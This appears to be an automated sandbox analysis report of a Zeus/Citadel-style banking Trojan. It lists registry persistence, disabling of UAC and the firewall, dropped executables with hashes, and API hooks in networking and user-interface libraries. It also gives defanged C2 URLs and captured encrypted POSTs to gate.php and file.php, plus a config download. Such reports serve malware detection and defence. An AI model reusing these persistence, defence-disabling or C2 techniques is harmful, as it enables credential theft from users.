[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

The process scvhost.exe:1208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 1C F8 C3 73 03 62 B5 F8 65 4C 41 81 8E 76 C4"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process scvhost.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 05 A7 41 BE 84 8A 07 F1 8D 91 D4 6C 7B 62 D4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

The process scvhost.exe:3704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 CD 1E 80 C0 CD 4A 6A E6 00 99 48 42 34 99 C5"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process tasklist.exe:2880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 03 FC 9E DE 3F A6 98 B6 19 AF 34 F9 3F A4 32"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process crys.exe:1460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 44 29 66 CD 18 66 91 9D E9 8B DE B6 0D 30 2C"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process crys.exe:3640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D AA 15 13 12 55 FC 1D 99 F6 7B EE D8 8F 86 91"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process loader.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 56 9B 2C 99 63 36 A8 20 F9 12 BC B3 FD 49 5D"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

The process ibza.exe:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 62 C1 E0 41 0A 8B 2A 4E 0F 7E D6 6B B1 3F DB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process hostname.exe:2756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 3C 29 8F 61 85 DF F1 00 23 D0 99 88 D7 69 62"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process ipconfig.exe:3116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 52 2A 8E 1E E8 42 E9 77 70 DF D9 38 16 A8 8C"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process soft.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 4A C2 33 93 0C 76 2C DB A0 07 2F 31 F5 0B 55"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process soft.exe:284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 6C AD 74 25 2D B1 7E B5 E1 5C 48 90 12 98 23"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process fffffffffffffff.exe:3440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 F1 AD 96 DF 13 EE DB BD E1 E4 B1 86 D7 A1 C5"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process netsh.exe:3540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED 2A 31 57 F8 C7 01 AF 21 A5 8F C6 DD 58 50 0F"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

Dropped PE files

MD5 File path
24b4781cbaa2591b06facbfb2b73599b c:\Documents and Settings\All Users\Application Data\wipeshadow.exe
2958d7758a7775e326769db66acfac8d c:\Documents and Settings\"%CurrentUserName%"\Application Data\Imxyhi\ibza.exe
2d77278e00ecaba9fabcf11ad1720012 c:\Documents and Settings\"%CurrentUserName%"\Application Data\Pony.exe
24b4781cbaa2591b06facbfb2b73599b c:\Documents and Settings\"%CurrentUserName%"\Application Data\cry.exe
338ed636747a1cc689df89959ab7b4ad c:\Documents and Settings\"%CurrentUserName%"\Application Data\crys.exe
0877a88f8d8a43e3fe07b4126fac9c6a c:\Documents and Settings\"%CurrentUserName%"\Application Data\soft.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in WINMM.dll:

PlaySoundW

The Trojan installs the following user-mode hooks in WININET.dll:

HttpEndRequestW
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetSetFilePointer
InternetQueryDataAvailable
HttpOpenRequestW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
HttpOpenRequestA

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in USER32.dll:

SetCursorPos
DefMDIChildProcA
DefFrameProcA
DefDlgProcA
GetClipboardData
DefMDIChildProcW
DefFrameProcW
GetUpdateRgn
RegisterClassA
GetDCEx
ReleaseCapture
SetCapture
DefWindowProcA
CallWindowProcA
GetUpdateRect
PeekMessageA
CallWindowProcW
GetMessagePos
GetCursorPos
EndPaint
BeginPaint
DefWindowProcW
RegisterClassExA
GetMessageA
DefDlgProcW
SwitchDesktop
OpenInputDesktop
RegisterClassExW
RegisterClassW
GetCapture
PeekMessageW
GetMessageW
GetWindowDC
TranslateMessage
GetDC
ReleaseDC

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CreateProcessAsUserA
CreateProcessAsUserW

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
gethostbyname
send
closesocket
getaddrinfo

The Trojan installs the following user-mode hooks in kernel32.dll:

ExitProcess
GetFileAttributesExW

The Trojan installs the following user-mode hooks in ntdll.dll:

NtCreateThread

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 1644868 1645056 5.19639 c50f13b6e21b445aefc09a4c9554d72c
.rsrc 1654784 1160 1536 4.0986 7ba591c539db9b226d38dc48c86bffae
.reloc 1662976 12 512 0.070639 b62f0a0d0bae3c8fd91794ccbd71dc50

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://e6845.dscb1.akamaiedge.net/pca3-g5.crl
hxxp://e6845.dscb1.akamaiedge.net/sf.crl
hxxp://brokelimiteds.in/wp-admin/css/php/file.php 142.4.17.213
hxxp://www.google.com/webhp 173.194.113.208
hxxp://www.google.com.ua/webhp?gfe_rd=cr&ei=vQaiV5nVOpC5ygX67qCwCA 173.194.113.208
hxxp://www.google.com.ua/webhp?gfe_rd=cr&ei=vwaiV67PD4u5ygXzlKKoAQ 173.194.113.208
hxxp://brokelimiteds.in/wp-admin/css/php/gate.php 142.4.17.213
hxxp://sf.symcb.com/sf.crl 23.63.133.163
hxxp://crl.verisign.com/pca3-g5.crl 23.63.133.163


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment
ET TROJAN Zeus Bot GET to Google checking Internet connectivity
ET TROJAN Trojan Generic - POST To gate.php with no referer
ET TROJAN Generic - POST To .php w/Extended ASCII Characters
ET TROJAN Generic -POST To gate.php w/Extended ASCII Characters

Traffic

GET /webhp?gfe_rd=cr&ei=vQaiV5nVOpC5ygX67qCwCA HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cache-Control: no-cache
Host: VVV.google.com.ua


HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vQaiV5nVOpC5ygX67qCwCA&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See hXXps://VVV.google.com/support/accounts/answer/151657?hl=en for more info."
Date: Wed, 03 Aug 2016 14:59:10 GMT
Server: gws
Content-Length: 283
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=83=vhqo0Y-gqfwjrCiTBFHAZr0YjeEOTak2Xdxxa-c7apY_yRw6n9ZCtLXDwa2UcOC3r6ENlJoMb11nYg-GcB-m7VqikiiVpYaANRqmQly6-LEy6U2S2eKp6T3KhwEJOmdK; expires=Thu, 02-Feb-2017 14:59:10 GMT; path=/; domain=.google.com.ua; HttpOnly
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vQaiV5
nVOpC5ygX67qCwCA&gws_rd=ssl">here</A>...</BODY><
/HTML>....



POST /wp-admin/css/php/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: brokelimiteds.in
Content-Length: 369
Connection: Keep-Alive
Cache-Control: no-cache

...)O..w....y..R
[email protected]_S......KD..x....k..
..`..... .....g6%/;m..
.{.).A.].$.......9.....7.3.i.D'...DMJ.#.....*.?...}..Tih.......F.....@.....~.g....c~.m.L.C...v\).C.n.a.yL.T......|,..g..m..
..C........T......j&.\D.L.k........G....H.T. ....5...OkP.2...G(?F...
R.R(A.kr8`.K.~................,O.HwJ6......>[email protected].(.
..A......D*./....`..c..t....V&\.f.!q.Zg.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 14:58:36 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.23
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
40...."..3"P..K;k.$......[.......DO<j.......~.r.....>p.....;....
.w&5..0..HTTP/1.1 200 OK..Date: Wed, 03 Aug 2016 14:58:36 GMT..Server:
 Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips DAV/2 mod_bwl
imited/1.4 mod_fcgid/2.3.9..X-Powered-By: PHP/5.6.23..Keep-Alive: time
out=5, max=100..Connection: Keep-Alive..Transfer-Encoding: chunked..Co
ntent-Type: text/html; charset=UTF-8..40...."..3"P..K;k.$......[......
.DO<j.......~.r.....>p.....;.....w&5..0..



POST /wp-admin/css/php/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: brokelimiteds.in
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache

..D.5.W.O.fK......iWd.i}&ovz.....GY:..2..y..^G..0Y...!%......^..
x[..-=X..[n.yQv4..........W.4.0.K.fF...Z.".F.....R.K.B.B.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 14:58:08 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.23
Cache-Control: public
Content-Disposition: attachment; filename="./files/config.dll"
Content-Transfer-Encoding: binary
Content-Length: 5344
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
.........3G..._.,...-.rm.....h|..u..........>......6.n..M..DmSe....
i..lC._.*X.......j7.H.p..x.oQ........]..FV....*?7.1.p...5W..UNXG.OH.r.
..F`.p.f..z....:Iw......;..[..7...... fs....S.R.g.....z.......3.\.,...
........(i...f0....e$..#..#.x..|q..>..&P>z...(..<..r....d6.W.
.6.'$=..!Z.bA.<....E(.B...........hO..v.H0..s.-...{......_...6p....
F...f..!~..J/toi.!.0...h=........$ 5.[d6_c..eQ?O...S....0.~w>..d^..
zJ...?.....S.S......fc...V...m..E7K.*...g....c#.2......t..../..R_..M..
.s..0^T.G.i?,.3.../.U.q...So..Jzki.;7r.......$.7o....<`c:.#.J#....7
d...'`h.....Dl4...GC....".]......*.i.:...\v..Q..K....;.../>..LK..g.
c.';.iX...Q...........,.{-up....5...{.>. .cny...2..gT...|..M......;
...p..q/..g.$.....Io..d.........R..5.......ij.C._..........u.4S..G.uO.
.z. .1X.On. #X.. d.wCK..R..6.......|\..W1.h....J.2..Y.._U...Gk.h.O....
..{1...g...r8oy.....O..g...X<.i....*.^..{....%.....(I.6>.8F..)2.
!..:..%....U.ztv..N^..dUT`&..[D...O...>L}.....t0.....D..q)*.3M.7O..
W.`.1.&C.reG*.o2.....-.....7.C.L...!.......?....0.A.g/...!m5Q.......Xu
.......9b..?..(..9.k_MHJ.......V38.q.{.......F"=...R...... @.U....<
...Bd.7X!......O.kTO.....K..W..y...3..m.}..P...../...\.,9.*.{.`W.8B...
3.....q..t...W6l.^..../..NR...!3....f....E...$...L..IL...Mc.4...4.|...
B..!.3.........DL........PT5^0..h=..4C..p .{..W..=.O.z....Y.ZB.....%q.
.R6.........jp[Wx.l...S..29."Pk....'.....fA.c#[email protected]..'L...]{..?\..(
....|..==P...../w..J"..:P|Q.8...Z9....g._../.%7n.D.G....W%......O..9=.
..S.......0S/..VL.^..)t.0".U..J.To.....F. .....5.cQ..-(?...._N..$t
<<< skipped >>>


GET /webhp?gfe_rd=cr&ei=vwaiV67PD4u5ygXzlKKoAQ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cookie: NID=83=vhqo0Y-gqfwjrCiTBFHAZr0YjeEOTak2Xdxxa-c7apY_yRw6n9ZCtLXDwa2UcOC3r6ENlJoMb11nYg-GcB-m7VqikiiVpYaANRqmQly6-LEy6U2S2eKp6T3KhwEJOmdK
Cache-Control: no-cache
Host: VVV.google.com.ua


HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=vwaiV67PD4u5ygXzlKKoAQ&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See hXXps://VVV.google.com/support/accounts/answer/151657?hl=en for more info."
Date: Wed, 03 Aug 2016 14:59:11 GMT
Server: gws
Content-Length: 283
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=83=ihMwwXI0KwesTolDbqjXLnRv4xbNtmsv_TyUTTQEd4MzLmTH6ilv-UlWklmIaKWb4yUoC9Si6ZuNI3hX3zkSOF_vmPfujQWBZvStI35pAHjzoZq7soFNwjCT9HPU42RF; expires=Thu, 02-Feb-2017 14:59:11 GMT; path=/; domain=.google.com.ua; HttpOnly
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
